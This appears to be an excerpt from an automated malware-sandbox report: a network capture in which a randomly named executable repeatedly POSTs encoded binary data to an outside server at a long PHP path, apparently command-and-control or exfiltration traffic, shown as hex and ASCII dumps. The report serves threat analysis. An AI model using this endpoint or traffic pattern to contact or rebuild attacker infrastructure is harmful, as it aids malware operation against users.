                                                            Data Raw: 01 10 21 03 31 3f 33 05 23 33 33 1e 2b 14 26 0b 2d 00 26 09 28 0d 25 5b 26 04 28 13 26 29 3a 0d 3f 11 24 5b 30 3a 3f 09 34 08 30 5d 29 0a 21 5a 0c 1d 26 5e 21 2b 24 0b 2b 07 38 11 28 13 30 5e 32 32 20 00 3c 2d 33 18 23 1d 33 59 25 23 12 52 2c 06 32 03 39 16 0c 06 25 3c 0c 5b 20 2d 23 5f 0c 14 27 51 22 32 2f 1d 34 33 26 1f 23 37 38 5f 20 27 2b 57 27 3d 28 13 32 06 26 07 3f 38 2f 0e 26 37 3c 1c 27 04 20 0d 26 07 23 55 2b 00 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: !1?3#33+&-&(%[&(&):?$[0:?40])!Z&^!+$+8(0^22 <-3#3Y%#R,29%<[ -#_'Q"2/43&#78_ '+W'=(2&?8/&7<' &#U+&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            100192.168.2.54981577.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:34.131325960 CET559OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1396
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:34.329173088 CET560INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:34.329386950 CET561OUTData Raw: 57 59 58 5e 5b 5d 5f 59 5d 57 55 57 55 5e 57 55 50 5e 58 40 56 55 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WYX^[]_Y]WUWU^WUP^X@VUWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*=X<!>34/$6]#)%_+U=&>:P309-%+ 8&G''^)?
                                                            Nov 21, 2023 04:48:34.532227993 CET564INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:34 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 21 03 31 3f 33 05 23 33 33 1e 2b 14 26 0b 2d 00 26 09 28 0d 25 5b 26 04 28 13 26 29 3a 0d 3f 11 24 5b 30 3a 3f 09 34 08 30 5d 29 0a 21 5a 0c 1d 26 5e 21 2b 24 0b 2b 07 38 11 28 13 30 5e 32 32 20 00 3c 2d 33 18 23 1d 33 59 25 23 12 52 2c 06 32 03 39 16 0c 06 25 3c 0c 5b 20 2d 23 5f 0c 14 27 51 22 32 2f 1d 34 33 26 1f 23 37 38 5f 20 27 2b 57 27 3d 28 13 32 06 26 07 3f 38 2f 0e 26 37 3c 1c 27 04 20 0d 26 07 23 55 2b 00 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: !1?3#33+&-&(%[&(&):?$[0:?40])!Z&^!+$+8(0^22 <-3#3Y%#R,29%<[ -#_'Q"2/43&#78_ '+W'=(2&?8/&7<' &#U+&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            101192.168.2.54981677.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:34.258927107 CET560OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:34.459631920 CET561INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:34.459961891 CET564OUTData Raw: 57 5e 5d 5d 5b 5b 5a 51 5d 57 55 57 55 57 57 53 50 5d 58 42 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W^]][[ZQ]WUWUWWSP]XBV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'\)"=;*R?#/$2_4=X+ "$>!&0.><,8>&G''^)
                                                            Nov 21, 2023 04:48:34.664002895 CET565INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:34 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            10177.91.124.10180192.168.2.549816C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:34.258927107 CET560OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:34.459631920 CET561INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:34.459961891 CET564OUTData Raw: 57 5e 5d 5d 5b 5b 5a 51 5d 57 55 57 55 57 57 53 50 5d 58 42 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W^]][[ZQ]WUWUWWSP]XBV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'\)"=;*R?#/$2_4=X+ "$>!&0.><,8>&G''^)
                                                            Nov 21, 2023 04:48:34.664002895 CET565INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:34 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            102192.168.2.54981777.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:34.998446941 CET566OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:35.196516037 CET566INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:35.196736097 CET569OUTData Raw: 52 5a 58 51 5e 5f 5f 59 5d 57 55 57 55 57 57 52 50 58 58 49 56 5f 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZXQ^__Y]WUWUWWRPXXIV_W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*85<*^/4%#:_)#*P'!$"U-(6^(-.&G''^)
                                                            Nov 21, 2023 04:48:35.399066925 CET569INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:35 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            10277.91.124.10180192.168.2.549817C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:34.998446941 CET566OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:35.196516037 CET566INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:35.196736097 CET569OUTData Raw: 52 5a 58 51 5e 5f 5f 59 5d 57 55 57 55 57 57 52 50 58 58 49 56 5f 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZXQ^__Y]WUWUWWRPXXIV_W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*85<*^/4%#:_)#*P'!$"U-(6^(-.&G''^)
                                                            Nov 21, 2023 04:48:35.399066925 CET569INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:35 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            103192.168.2.54981877.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:35.722460985 CET570OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:35.920638084 CET570INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:35.921303988 CET572OUTData Raw: 57 5d 58 51 5b 58 5a 5b 5d 57 55 57 55 5e 57 5a 50 5c 58 44 56 57 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W]XQ[XZ[]WUWU^WZP\XDVWW^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*^)Y=(1)88#*<>3==0-8*\?</&G''^)
                                                            Nov 21, 2023 04:48:36.124488115 CET573INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:35 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            10377.91.124.10180192.168.2.549818C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:35.722460985 CET570OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:35.920638084 CET570INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:35.921303988 CET572OUTData Raw: 57 5d 58 51 5b 58 5a 5b 5d 57 55 57 55 5e 57 5a 50 5c 58 44 56 57 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W]XQ[XZ[]WUWU^WZP\XDVWW^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*^)Y=(1)88#*<>3==0-8*\?</&G''^)
                                                            Nov 21, 2023 04:48:36.124488115 CET573INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:35 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            10477.91.124.10180192.168.2.549819C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:36.454344034 CET573OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:36.651806116 CET574INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:36.652051926 CET576OUTData Raw: 52 5f 58 5c 5b 53 5a 50 5d 57 55 57 55 5e 57 55 50 5b 58 42 56 5e 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_X\[SZP]WUWU^WUP[XBV^W\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_*;)Y<89?##;&#\&<&R'>1'>-;><,,.&G''^)?
                                                            Nov 21, 2023 04:48:36.858058929 CET577INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:36 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            104192.168.2.54981977.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:36.454344034 CET573OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:36.651806116 CET574INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:36.652051926 CET576OUTData Raw: 52 5f 58 5c 5b 53 5a 50 5d 57 55 57 55 5e 57 55 50 5b 58 42 56 5e 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_X\[SZP]WUWU^WUP[XBV^W\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_*;)Y<89?##;&#\&<&R'>1'>-;><,,.&G''^)?
                                                            Nov 21, 2023 04:48:36.858058929 CET577INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:36 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            10577.91.124.10180192.168.2.549820C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:37.176589012 CET578OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:37.373348951 CET578INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:37.373555899 CET580OUTData Raw: 57 59 5d 5a 5b 59 5a 5f 5d 57 55 57 55 5a 57 56 50 5d 58 45 56 54 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WY]Z[YZ_]WUWUZWVP]XEVTWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$==X<.R=07/7.79:?U!3=9$0%98>^?88>&G''^)7
                                                            Nov 21, 2023 04:48:37.576966047 CET581INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:37 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            105192.168.2.54982077.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:37.176589012 CET578OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:37.373348951 CET578INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:37.373555899 CET580OUTData Raw: 57 59 5d 5a 5b 59 5a 5f 5d 57 55 57 55 5a 57 56 50 5d 58 45 56 54 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WY]Z[YZ_]WUWUZWVP]XEVTWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$==X<.R=07/7.79:?U!3=9$0%98>^?88>&G''^)7
                                                            Nov 21, 2023 04:48:37.576966047 CET581INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:37 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            10677.91.124.10180192.168.2.549821C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:37.894817114 CET581OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:38.093694925 CET582INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:38.093915939 CET584OUTData Raw: 52 5f 5d 5d 5b 5f 5f 5a 5d 57 55 57 55 5b 57 52 50 52 58 40 56 54 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_]][__Z]WUWU[WRPRX@VTW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>82(9?0'[8$&\7*]) %'W&0:R,;><,;^/&G''^)3
                                                            Nov 21, 2023 04:48:38.297655106 CET584INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:37 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            106192.168.2.54982177.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:37.894817114 CET581OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:38.093694925 CET582INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:38.093915939 CET584OUTData Raw: 52 5f 5d 5d 5b 5f 5f 5a 5d 57 55 57 55 5b 57 52 50 52 58 40 56 54 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
